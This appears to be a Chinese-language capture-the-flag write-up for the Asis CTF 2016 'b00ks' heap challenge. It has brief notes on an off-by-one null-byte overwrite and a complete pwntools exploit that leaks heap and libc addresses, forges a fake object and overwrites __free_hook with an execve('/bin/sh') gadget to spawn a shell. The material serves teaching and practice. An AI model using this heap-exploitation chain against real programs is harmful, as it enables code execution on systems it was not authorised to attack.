实例:
Asis CTF 2016 b00ks
程序分析:
- strlen不计算最后一个0,而strcpy会复制最后一个0,这里的关键在于将存储堆指针的数据给改了,后续都是通过这个指针访问目标堆的,如此导致可被利用,很多heap的题都是修改了存储堆指针的数组来利用的,后面的unlink题也有类似情况
- 2个全局指针指向author_name和book的数组, author_name后面紧挨着book指针数组. book指针数组存储各个book结构体地址,
- 各个book分配在堆里面,book的name和desc也分配在堆里面.
exp总结
1.主线程超大内存块通过mmap分配,分配的内存在libc的bss段里面可以得到libc基址
2.__free_hook和__malloc_hook经常用于堆中的劫持
3.off_by_one让控制一个指针低地址为0或者其他数值,使其指向别的可控的地方.
#coding:utf-8
from pwn import *
context.log_level = 'debug'
p = process("./b00ks")
libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
def memleak1(p):
p.sendline("4")
log.info(p.recvuntil("Author:"))
msg = p.recvline()
log.info(p.recvuntil(">"))
msg = msg.split("A"*32)[1].strip("\n")
addr = u64(msg.ljust(8, "\x00"))
log.success("Leaked address of struct object : " + hex(addr))
return addr
def memleak2(p):
p.sendline("4")
p.recvuntil("Name: ")
msg=p.recvline().strip("\n")
msg=u64(msg.ljust(8, "\x00"))
log.info(p.recv(timeout = 1))
log.success("Leaked address of allocated area " + hex(msg))
return msg
def change_ptr(p):
log.progress("Changing the struct pointer")
p.sendline("5")
log.info(p.recvuntil(":"))
p.sendline("A"*32)
log.info(p.recvuntil(">"))
def fake_obj(p, payload, index):
log.progress("Editing description")
p.sendline("3")
log.info(p.recvuntil(":"))
p.sendline(str(index))
log.info(p.recvuntil(":"))
p.sendline(payload)
def create_book(p,size):
p.sendline("1")
log.info(p.recvuntil(":"))
p.sendline(str(size))
log.info(p.recvuntil(":"))
p.sendline("asdf")
log.info(p.recvuntil(":"))
p.sendline(str(size))
log.info(p.recvuntil(":"))
p.sendline("asdf")
log.info(p.recvuntil(">"))
def release():
p.sendline("2")
log.info(p.recvuntil(":"))
p.sendline("2")
log.info(p.recvuntil(":"))
p.sendline("A"*32)#填满authorname,以便让book1地址覆盖掉他的0
log.info(p.recvuntil(">"))
create_book(p, 140)
addr = memleak1(p) + 0x38 #address of second object on heap,addr指向book2的name偏移处
create_book(p, 0x21000) #allocate new area
payload = "A"*0x40 + p64(0x1) + p64(addr) * 2 + p64(0xffff) #fake obj,首地址==用authorname覆盖掉地址1的第一个字节
fake_obj(p, payload, 1)
change_ptr(p) #null overflow 这时book1的地址被修改成fake book
addr = memleak2(p)#泄漏book2的name的地址
log.info(hex(addr))
#part two
'''
由于大家的环境不相同, 所以其中的个别参数需要自己稍微调整一下
0x5cd010 --> 泄露的地址到libcbase的距离
0x4526a --> libc.so.6中的execve("/bin/sh", NULL, NULL)的偏移
'''
libcbase = addr - 0x5AA010 #由于是mmap申请的内存,因此存在于libc的bss段中,并且偏移固定,以此计算libc基址
log.info("libcbase: %s" % hex(libcbase))
free_hook = libc.symbols['__free_hook'] + libcbase
execve_addr = libcbase + 0x4526a
#part three
payload = p64(111)+p64(free_hook)#
fake_obj(p, payload, 1) #这一次将fake book的desc指向free_hook,即将book2的desc修改为free_hook地址
payload = p64(execve_addr)
fake_obj(p, payload, 2)#这一次将book2的desc的内容修改为execve_addr.
release()#当释放内存时会检查free_hook是否为0,不为0则优先调用free_hook指向的函数
p.interactive()
网友评论